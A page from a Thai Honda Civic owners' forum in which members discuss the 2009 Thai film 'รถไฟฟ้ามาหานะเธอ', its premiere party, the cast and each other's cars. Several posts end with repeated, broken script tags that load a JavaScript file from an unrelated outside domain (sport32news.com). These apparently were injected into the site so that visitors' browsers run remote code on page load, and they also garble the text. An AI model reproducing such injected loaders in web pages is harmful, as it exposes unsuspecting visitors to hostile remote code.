ตอบ
Hamster@Yamabuchi

ชื่อเล่น: เบิร์ด

เข้าร่วม: 27 มีนา 2009
ตอบ: 2005

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5433
ให้คำขอบคุณ: 3267

ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
อังคาร, 20 ตุลา 2009 12:57 - ~~ ร ถ ไ ฟ ฟ้ า ม า ห า น ะ เ ธ อ (ชอบว่ะ) (เพิ่ม MV & มะขิ่น ใน อีติ๋มตายแน่) ~~
ดาราคนใหม่....................ฟานกงกง.........................แห่งรถขยะมาเก็บแล้วเมีย...........ฉายในโลงศพตามวัดทั่วไปแล้วครับ 555

Attached File :
~~ ร ถ ไ ฟ ฟ้ า ม า ห า น ะ เ ธ อ (ชอบว่ะ) (เพิ่ม MV & มะขิ่น ใน อีติ๋มตายแน่) ~~
ได้รับคำขอบคุณจาก: kunshybeer08  chengg  Shoke  Lee_ES_turbo  ~ สเตฟาน ~  Ti_es03  PAM  AlwaysCivic 
Wal2n_ES

ชื่อเล่น: ว่าน

เข้าร่วม: 01 ตุลา 2008
ตอบ: 615

Guru ES
Guru ES

ได้รับคำขอบคุณ: 812
ให้คำขอบคุณ: 819

ปี: 2003
อังคาร, 20 ตุลา 2009 12:59 - ~~ ร ถ ไ ฟ ฟ้ า ม า ห า น ะ เ ธ อ (ชอบว่ะ) (เพิ่ม MV & มะขิ่น ใน อีติ๋มตายแน่) ~~
Hamster@Yamabuchi พิมพ์ว่า:
ดาราคนใหม่....................ฟานกงกง.........................แห่งรถขยะมาเก็บแล้วเมีย...........ฉายในโลงศพตามวัดทั่วไปแล้วครับ 555

<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></

สวดยอดเลยน้า
ได้รับคำขอบคุณจาก: kunshybeer08  ~ สเตฟาน ~ 
kunshybeer08

เข้าร่วม: 02 ตุลา 2008
ตอบ: 914

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1063
ให้คำขอบคุณ: 1702

ปี: 2004
อังคาร, 20 ตุลา 2009 13:32 - ~~ ร ถ ไ ฟ ฟ้ า ม า ห า น ะ เ ธ อ (ชอบว่ะ) (เพิ่ม MV & มะขิ่น ใน อีติ๋มตายแน่) ~~
ดูกี่ทีก็ถูกจาย...สังเกตุที่สายตาพี่แกเด่ะ...ประมาณว่า มึงเสดกรูแน่.....5555 <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: ~ สเตฟาน ~  chengg 
Ti_es03

ตอบ: 408

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 590
ให้คำขอบคุณ: 440

สี: ทอง แซทเทิลไลท์ (NH-663M)
อังคาร, 20 ตุลา 2009 14:25 - ~~ ร ถ ไ ฟ ฟ้ า ม า ห า น ะ เ ธ อ (ชอบว่ะ) (เพิ่ม MV & มะขิ่น ใน อีติ๋มตายแน่) ~~
หล่อได้อีกคร๊าบพี่ชาย

ว่าแต่น้องแพทตี้ น่ารักมากๆๆๆๆๆๆๆ
ได้รับคำขอบคุณจาก: ~ สเตฟาน ~  superaod 
PAM

ชื่อเล่น: แป๋ม

เข้าร่วม: 17 กรกฎา 2009
ตอบ: 1514

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2753
ให้คำขอบคุณ: 2884

สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 20 ตุลา 2009 16:13 - ~~ ร ถ ไ ฟ ฟ้ า ม า ห า น ะ เ ธ อ (ชอบว่ะ) (เพิ่ม MV & มะขิ่น ใน อีติ๋มตายแน่) ~~

ได้ใจมากสุดๆ จองตั๋วล่วงหน้าครับ ผมจองตั๋ว 2 ใบ ครึ่ง ครับ 5555555 <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></

แก้ไขล่าสุดโดย เมื่อ พฤหัส, 22 ตุลา 2009 00:45, ทั้งหมด 3 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: ~ สเตฟาน ~ 
somkides01

ชื่อเล่น: คิด

เข้าร่วม: 13 ตุลา 2008
ตอบ: 893

Guru ES
Guru ES

ได้รับคำขอบคุณ: 883
ให้คำขอบคุณ: 118

ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 20 ตุลา 2009 16:19 - ~~ ร ถ ไ ฟ ฟ้ า ม า ห า น ะ เ ธ อ (ชอบว่ะ) (เพิ่ม MV & มะขิ่น ใน อีติ๋มตายแน่) ~~
ไปดูมาแล้วคราย
น่ารักดีคราบ
ได้รับคำขอบคุณจาก: ~ สเตฟาน ~  superaod 
AlwaysCivic

เข้าร่วม: 29 ตุลา 2008
ตอบ: 181

มือใหม่หัดขับ

ได้รับคำขอบคุณ: 618
ให้คำขอบคุณ: 422

อังคาร, 20 ตุลา 2009 22:54 - ~~ ร ถ ไ ฟ ฟ้ า ม า ห า น ะ เ ธ อ (ชอบว่ะ) (เพิ่ม MV & มะขิ่น ใน อีติ๋มตายแน่) ~~
superaod พิมพ์ว่า:
kunshybeer08 พิมพ์ว่า:
ขอบคุณทุกท่านที่แวะไปดูครับ :)

ผมจะส่งข้อความทั้งหมดที่ได้อ่าน ไปให้ผู้กำกับและทีมเขียนบท ครับ

และวันพรุ่งนี้ จะมีงานเลี้ยงฉลองรายได้ กันแล้วนะครับ

ขอบคุณทุกท่านอีกครั้งนึงครับ es น่ารักทุกคนเลย

ถ้าไม่เป็นการรบกวนจนเกินไป เก็บภาพบรรยากาศมาฝากกันบ้างนะครับ โดยเฉพาะคริส หอวัง
เอามาฝาก จขกท. หน่อย

เดี๋ยวจัดให้ ครับผม :)

เข้ามารอชมครับ พอดีเพิ่งกลับจากงานนี้มาเหมือนกัน เสียดายไม่ได้พกกล้องถ่ายรูปไปด้วย

น้องคริสตัวจริงน่ารักมากๆครับ เคนก็หล่อเทพอ่ะ โอปอลตัวจริงก็เซ็กซี่เกิ๊นนนน

ว่าแต่รถคุณอ๊อดใช่ สท XXX สีเทาล้อสีทอง ที่จอดที่ NAZ รึเปล่าครับ รถหล่อมากครับ & คนขับก็หล่อครับ
ได้รับคำขอบคุณจาก: chengg  ~ สเตฟาน ~  superaod 
Hellboy

ชื่อเล่น: ป๋อ

เข้าร่วม: 12 สิงหา 2009
ตอบ: 94

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 100
ให้คำขอบคุณ: 129

พุธ, 21 ตุลา 2009 08:13 - ~~ ร ถ ไ ฟ ฟ้ า ม า ห า น ะ เ ธ อ (ชอบว่ะ) (เพิ่ม MV & มะขิ่น ใน อีติ๋มตายแน่) ~~
หนังดูน่าสนุกดีครับ แต่เลยช่วงนั้นมานานแล้ว ไม่รู้จะอินหรือเปล่า
iMan

ชื่อเล่น: แมน

เข้าร่วม: 04 สิงหา 2008
ตอบ: 2838

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 12149
ให้คำขอบคุณ: 3080

พุธ, 21 ตุลา 2009 11:31 - ~~ ร ถ ไ ฟ ฟ้ า ม า ห า น ะ เ ธ อ (ชอบว่ะ) (เพิ่ม MV & มะขิ่น ใน อีติ๋มตายแน่) ~~
อยากถามพี่เอกอะล้วง ว่า ทำไมถึงไปยืนบนเวที กะเค้าได้......คับพี่

~~ ร ถ ไ ฟ ฟ้ า ม า ห า น ะ เ ธ อ (ชอบว่ะ) (เพิ่ม MV & มะขิ่น ใน อีติ๋มตายแน่) ~~
ได้รับคำขอบคุณจาก: superaod  kunshybeer08  ~ สเตฟาน ~  Hamster@Yamabuchi  TUI_PeTiTe 
superaod

ชื่อเล่น: อ๊อด

เข้าร่วม: 08 มิถุนา 2009
ตอบ: 75

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 92
ให้คำขอบคุณ: 23

สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 21 ตุลา 2009 11:37 - ~~ ร ถ ไ ฟ ฟ้ า ม า ห า น ะ เ ธ อ (ชอบว่ะ) (เพิ่ม MV & มะขิ่น ใน อีติ๋มตายแน่) ~~
AlwaysCivic พิมพ์ว่า:
ขอบคุณทุกท่านที่แวะไปดูครับ :)

ผมจะส่งข้อความทั้งหมดที่ได้อ่าน ไปให้ผู้กำกับและทีมเขียนบท ครับ

และวันพรุ่งนี้ จะมีงานเลี้ยงฉลองรายได้ กันแล้วนะครับ

ขอบคุณทุกท่านอีกครั้งนึงครับ es น่ารักทุกคนเลย

ถ้าไม่เป็นการรบกวนจนเกินไป เก็บภาพบรรยากาศมาฝากกันบ้างนะครับ โดยเฉพาะคริส หอวัง

เข้ามารอชมครับ พอดีเพิ่งกลับจากงานนี้มาเหมือนกัน เสียดายไม่ได้พกกล้องถ่ายรูปไปด้วย

น้องคริสตัวจริงน่ารักมากๆครับ เคนก็หล่อเทพอ่ะ โอปอลตัวจริงก็เซ็กซี่เกิ๊นนนน

ว่าแต่รถคุณอ๊อดใช่ สท XXX สีเทาล้อสีทอง ที่จอดที่ NAZ รึเปล่าครับ รถหล่อมากครับ & คนขับก็หล่อครับ

อ้าว ไปด้วยเหรอครับ ผม ศท xxx ครับผม แต่เทา จิงครับ

เสียดายเลยง่ะ มะงั้น ได้รู้จักกันแล้วครับ

เมื่อคืน เมามากมายครับ 5 5 5
ได้รับคำขอบคุณจาก: iMan  ~ สเตฟาน ~ 
superaod

สมาชิกสับสน
สมาชิกสับสน

สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 21 ตุลา 2009 11:53 - ~~ ร ถ ไ ฟ ฟ้ า ม า ห า น ะ เ ธ อ (ชอบว่ะ) (เพิ่ม MV & มะขิ่น ใน อีติ๋มตายแน่) ~~
เอาบรรยากาศมาลงก่อนนะครับ เดี๋ยวรูปเมนๆ เอามาลงอีกทีครับ

ถ่ายจากมือถือครับ คุณภาพไม่ได้แต่เอาบรรยากาศนะครับ
ได้รับคำขอบคุณจาก: ~ สเตฟาน ~  AlwaysCivic  ohm 
kunshybeer08

เข้าร่วม: 02 ตุลา 2008
ตอบ: 914

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1063
ให้คำขอบคุณ: 1702

พุธ, 21 ตุลา 2009 11:56 - ~~ ร ถ ไ ฟ ฟ้ า ม า ห า น ะ เ ธ อ (ชอบว่ะ) (เพิ่ม MV & มะขิ่น ใน อีติ๋มตายแน่) ~~
รอดูรูปก๊าบ..บบ

แก้ไขล่าสุดโดย เมื่อ พุธ, 21 ตุลา 2009 12:00, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: superaod 
~ สเตฟาน ~

ชื่อเล่น: สเตฟาน

ตอบ: 2023

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 7729
ให้คำขอบคุณ: 4939

พุธ, 21 ตุลา 2009 11:57 - ~~ ร ถ ไ ฟ ฟ้ า ม า ห า น ะ เ ธ อ (ชอบว่ะ) (เพิ่ม MV & มะขิ่น ใน อีติ๋มตายแน่) ~~
เสียดายไม่ได้ไป

เฮ้ออออออออออออ โอกาสอย่างนี้จะมีอีกมั๊ยเนี่ย ...เศร้า
AlwaysCivic

เข้าร่วม: 29 ตุลา 2008
ตอบ: 181

ได้รับคำขอบคุณ: 618
ให้คำขอบคุณ: 422

พุธ, 21 ตุลา 2009 12:03 - ~~ ร ถ ไ ฟ ฟ้ า ม า ห า น ะ เ ธ อ (ชอบว่ะ) (เพิ่ม MV & มะขิ่น ใน อีติ๋มตายแน่) ~~

อ้าว ไปด้วยเหรอครับ ผม ศท xxx ครับผม แต่เทา จิงครับ

เสียดายเลยง่ะ มะงั้น ได้รู้จักกันแล้วครับ

งั้นก็ใช่แล้วครับ ศท XX6 ผมรีบพิมพ์เลยไม่ทันกด shift อ่ะ

งานเลี้ยงจัดได้ยิ่งใหญ่ดีครับ เหล้า-เบียร์-อาหารเพียบ แต่พอดีผมกินเจ

เอาไว้ไปเมาด้วย ตอนเลี้ยงฉลองเรื่องหน้าก็ได้ครับ
ได้รับคำขอบคุณจาก: superaod  ~ สเตฟาน ~ 
K_series

ตอบ: 3032

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 22059
ให้คำขอบคุณ: 6045
พุธ, 21 ตุลา 2009 23:22 - ~~ ร ถ ไ ฟ ฟ้ า ม า ห า น ะ เ ธ อ (ชอบว่ะ) (เพิ่ม MV & มะขิ่น ใน อีติ๋มตายแน่) ~~
พี่ฟานตื่นมาดูช่อง5เร้วววววววววววววววววววววววว

มีคริสกะน้องแพ็ตตี้จร้า
ได้รับคำขอบคุณจาก: chengg  superaod  ~ สเตฟาน ~ 
biggsnui

ชื่อเล่น: หนุ่ย

เข้าร่วม: 18 มิถุนา 2009
ตอบ: 854

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1300
ให้คำขอบคุณ: 1618

ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พฤหัส, 22 ตุลา 2009 01:29 - ~~ ร ถ ไ ฟ ฟ้ า ม า ห า น ะ เ ธ อ (ชอบว่ะ) (เพิ่ม MV & มะขิ่น ใน อีติ๋มตายแน่) ~~
พึ่งกลับจากโรงหนัง
บอกได้คำเดียวว่าไร้ที่ติ
ได้รับคำขอบคุณจาก: superaod  ~ สเตฟาน ~ 
superaod

สมาชิกสับสน
สมาชิกสับสน

พฤหัส, 22 ตุลา 2009 10:03 - ~~ ร ถ ไ ฟ ฟ้ า ม า ห า น ะ เ ธ อ (ชอบว่ะ) (เพิ่ม MV & มะขิ่น ใน อีติ๋มตายแน่) ~~

งั้นก็ใช่แล้วครับ ศท XX6 ผมรีบพิมพ์เลยไม่ทันกด shift อ่ะ

งานเลี้ยงจัดได้ยิ่งใหญ่ดีครับ เหล้า-เบียร์-อาหารเพียบ แต่พอดีผมกินเจ

เอาไว้ไปเมาด้วย ตอนเลี้ยงฉลองเรื่องหน้าก็ได้ครับ

ขอบคุณครับ เอ่อ .. ชื่ออะไรอ่ะครับ คราวหน้าเดี๋ยวเดินหาเลยครับผม :D

เรื่องหน้าต้องปีหน้าแล้วนะคร้าบ ปีนี้ ไลน์อัพ หมดแว้ว .... :D
ได้รับคำขอบคุณจาก: ~ สเตฟาน ~ 
superaod

สมาชิกสับสน
สมาชิกสับสน

พฤหัส, 22 ตุลา 2009 11:00 - ~~ ร ถ ไ ฟ ฟ้ า ม า ห า น ะ เ ธ อ (ชอบว่ะ) (เพิ่ม MV & มะขิ่น ใน อีติ๋มตายแน่) ~~
มาแว้ว รูปงานเดี๋ยวค่อยๆลงนะคร้าบ
ได้รับคำขอบคุณจาก: ~ สเตฟาน ~  ohm 
superaod

สมาชิกสับสน
สมาชิกสับสน

พฤหัส, 22 ตุลา 2009 11:10 - ~~ ร ถ ไ ฟ ฟ้ า ม า ห า น ะ เ ธ อ (ชอบว่ะ) (เพิ่ม MV & มะขิ่น ใน อีติ๋มตายแน่) ~~
ดารา นำครับ ทั้ง เคน และ น้องคริส

ทีมงาน และผู้สนับสนุน ร่วมยินดี คร้าบ

แพตตี้ เคน ผกก.พี่ปิ๊ง และเช่นกัน น้องคริส ครับ

ผกก.มอบชุดประจำตังแก่นักแสดงเป็นของที่ระทึก ครับ 5 5 5

ได้รับคำขอบคุณจาก: kunshybeer08  ~ สเตฟาน ~  ohm 
superaod

สมาชิกสับสน
สมาชิกสับสน

พฤหัส, 22 ตุลา 2009 11:16 - ~~ ร ถ ไ ฟ ฟ้ า ม า ห า น ะ เ ธ อ (ชอบว่ะ) (เพิ่ม MV & มะขิ่น ใน อีติ๋มตายแน่) ~~
และ สุดยอด ดารานำหญิงตัวจริงของ GTH

แพตตี้ น้องคนนี้ ผมขอเป็นเจ้ดันเอง 5 5 5

รูปนี้ ให้ คุณ ฟาน ครับผม

และรูปนี้ เผื่อ สาวๆ ใน ES ครับผม ^^

เท่านี้ก่อนนะครับ เดี๋ยวจัดให้อีก :D
ได้รับคำขอบคุณจาก: kunshybeer08  ~ สเตฟาน ~  ohm  chengg  Jeab22 
iMan

ชื่อเล่น: แมน

เข้าร่วม: 04 สิงหา 2008
ตอบ: 2838

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 12149
ให้คำขอบคุณ: 3080

พฤหัส, 22 ตุลา 2009 15:24 - ~~ ร ถ ไ ฟ ฟ้ า ม า ห า น ะ เ ธ อ (ชอบว่ะ) (เพิ่ม MV & มะขิ่น ใน อีติ๋มตายแน่) ~~
แต่ผมชอบคนนี้

ได้รับคำขอบคุณจาก: chengg  PAM  superaod  kunshybeer08  ~ สเตฟาน ~  Jeab22  Ti_es03 
~ สเตฟาน ~

ชื่อเล่น: สเตฟาน

ตอบ: 2023

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 7729
ให้คำขอบคุณ: 4939

พฤหัส, 22 ตุลา 2009 17:15 - ~~ ร ถ ไ ฟ ฟ้ า ม า ห า น ะ เ ธ อ (ชอบว่ะ) (เพิ่ม MV & มะขิ่น ใน อีติ๋มตายแน่) ~~
ว่าจะไปดูอีกสักรอบ

มีใครสนใจไปดูพร้อมกันบ้างมั๊ยครับ
TUI_PeTiTe

เข้าร่วม: 24 สิงหา 2008
ตอบ: 3394

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 11353
ให้คำขอบคุณ: 3321

พฤหัส, 22 ตุลา 2009 17:18 - ~~ ร ถ ไ ฟ ฟ้ า ม า ห า น ะ เ ธ อ (ชอบว่ะ) (เพิ่ม MV & มะขิ่น ใน อีติ๋มตายแน่) ~~
โอ้ยยยย!!! เหมือนเอกอะล้วงซะจริงๆ....อิอิ^^
Alert

ชื่อเล่น: เลิ๊ด

เข้าร่วม: 20 สิงหา 2008
ตอบ: 618

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1516
ให้คำขอบคุณ: 70

พฤหัส, 22 ตุลา 2009 17:33 - ~~ ร ถ ไ ฟ ฟ้ า ม า ห า น ะ เ ธ อ (ชอบว่ะ) (เพิ่ม MV & มะขิ่น ใน อีติ๋มตายแน่) ~~
TUI_PeTiTe พิมพ์ว่า:
โอ้ยยยย!!! เหมือนเอกอะล้วงซะจริงๆ....อิอิ^^

หลายคนบอกเหมือนกันครับว่าเหมือน เคน ธีรเดช <script src="https://sport32news.com/civicesgroup.js"></
TUI_PeTiTe

ครอบครัว ES
ครอบครัว ES

พฤหัส, 22 ตุลา 2009 17:57 - ~~ ร ถ ไ ฟ ฟ้ า ม า ห า น ะ เ ธ อ (ชอบว่ะ) (เพิ่ม MV & มะขิ่น ใน อีติ๋มตายแน่) ~~
Alert พิมพ์ว่า:
TUI_PeTiTe พิมพ์ว่า:

หลายคนบอกเหมือนกันครับว่าเหมือน เคน ธีรเดช <script src="https://sport32news.com/civicesgroup.js"></

เหรอ!!!!
Hamster@Yamabuchi

ชื่อเล่น: เบิร์ด

เข้าร่วม: 27 มีนา 2009
ตอบ: 2005

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5433
ให้คำขอบคุณ: 3267

เสาร์, 24 ตุลา 2009 10:05 - ~~ ร ถ ไ ฟ ฟ้ า ม า ห า น ะ เ ธ อ (ชอบว่ะ) (เพิ่ม MV & มะขิ่น ใน อีติ๋มตายแน่) ~~
ดูแล้วเรียบร้อย กับแฟน อิอิอิ แฟนร้องไห้...........ส่วนผมหน้าชาๆ ในบางช่วง ยกให้เป็นหนังไทยที่ดีที่สุดในรอบปี 2552 ที่ผมได้ดูมา สร้างหนังได้ดีมาก ยกเว้นช่วงท้ายๆ ที่มันแปลกๆ ไปนิดนึง แต่ก็ถือว่าโอเคสุดๆ...............................................ชอบ เคน ธีรเดช มากที่สุด เพราะเค้าคนนี้เป็นผู้ชายที่สร้างความรู้สึกอบอุ่นที่สุดเท่าที่ผมเคยเห็นจิงๆ................................................ส่วนนางเอก คริส หอวัง ก็โอเคนะ มาติดตอนท้ายๆของเรื่องก่อนจบนี่ล่ะ ที่ทำให้ผมรู้สึกเฉยๆไปเลย................................แต่สุดท้ายอยากบอกว่า คุ้มค่ากับการไปดู และมันเป็นหนังเรื่องนึงที่ผมจะต้องซื้อ DVD เก็บไว้แน่นอน
ได้รับคำขอบคุณจาก: chengg 
TUI_PeTiTe

ครอบครัว ES
ครอบครัว ES

เสาร์, 24 ตุลา 2009 13:24 - ~~ ร ถ ไ ฟ ฟ้ า ม า ห า น ะ เ ธ อ (ชอบว่ะ) (เพิ่ม MV & มะขิ่น ใน อีติ๋มตายแน่) ~~
ดูแล้วเรียบร้อย กับแฟน อิอิอิ แฟนร้องไห้...........ส่วนผมหน้าชาๆ ในบางช่วง ยกให้เป็นหนังไทยที่ดีที่สุดในรอบปี 2552 ที่ผมได้ดูมา สร้างหนังได้ดีมาก ยกเว้นช่วงท้ายๆ ที่มันแปลกๆ ไปนิดนึง แต่ก็ถือว่าโอเคสุดๆ...............................................ชอบ เคน ธีรเดช มากที่สุด เพราะเค้าคนนี้เป็นผู้ชายที่สร้างความรู้สึกอบอุ่นที่สุดเท่าที่ผมเคยเห็นจิงๆ................................................ส่วนนางเอก คริส หอวัง ก็โอเคนะ มาติดตอนท้ายๆของเรื่องก่อนจบนี่ล่ะ ที่ทำให้ผมรู้สึกเฉยๆไปเลย................................แต่สุดท้ายอยากบอกว่า คุ้มค่ากับการไปดู และมันเป็นหนังเรื่องนึงที่ผมจะต้องซื้อ DVD เก็บไว้แน่นอน

ตรงข้อความสีแดงน่ะเป็นเพราะโดนแฟนตบหน้าที่ไปแอบดูใต้กระโปรงน้องคนข้างๆเหรอเพ่หมวด....อิอิ
ได้รับคำขอบคุณจาก: Hamster@Yamabuchi 
oil_nirun

ชื่อเล่น: ออย

ตอบ: 746

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1338
ให้คำขอบคุณ: 535

เสาร์, 7 พฤศจิกา 2009 13:32 - ~~ ร ถ ไ ฟ ฟ้ า ม า ห า น ะ เ ธ อ (ชอบว่ะ) (เพิ่ม MV & มะขิ่น ใน อีติ๋มตายแน่) ~~
"คนเป็นแฟนกัน ไม่มีเวลาให้กัน ไม่เจอกัน แล้วจะเรียกว่า แฟนได้ไง"

คัยมีความเห็นว่าไงคับ...
สำหรับผมว่าจริงคับ...(แพ้ใกล้ชิด)
ได้รับคำขอบคุณจาก: TUI_PeTiTe 
TUI_PeTiTe

ครอบครัว ES
ครอบครัว ES

เสาร์, 7 พฤศจิกา 2009 14:59 - ~~ ร ถ ไ ฟ ฟ้ า ม า ห า น ะ เ ธ อ (ชอบว่ะ) (เพิ่ม MV & มะขิ่น ใน อีติ๋มตายแน่) ~~
oil_nirun พิมพ์ว่า:
"คนเป็นแฟนกัน ไม่มีเวลาให้กัน ไม่เจอกัน แล้วจะเรียกว่า แฟนได้ไง"

คัยมีความเห็นว่าไงคับ...
สำหรับผมว่าจริงคับ...(แพ้ใกล้ชิด)

ความรักลึกล้ำ....ยากแท้....หยั่งถึง....
YINDEE

ชื่อเล่น: ต๊อด

ตอบ: 1516

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3233
ให้คำขอบคุณ: 3684

สี: ม่วง วินเทจพลัม (RP-32P)
เสาร์, 7 พฤศจิกา 2009 17:15 - ~~ ร ถ ไ ฟ ฟ้ า ม า ห า น ะ เ ธ อ (ชอบว่ะ) (เพิ่ม MV & มะขิ่น ใน อีติ๋มตายแน่) ~~
DVD Transformers revenge of the fallen ออกแล้วนะคร๊าบบบบบ ! <script src="https://sport32news.com/civicesgroup.js"></
ตอบ
หน้า 4 จาก 5
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.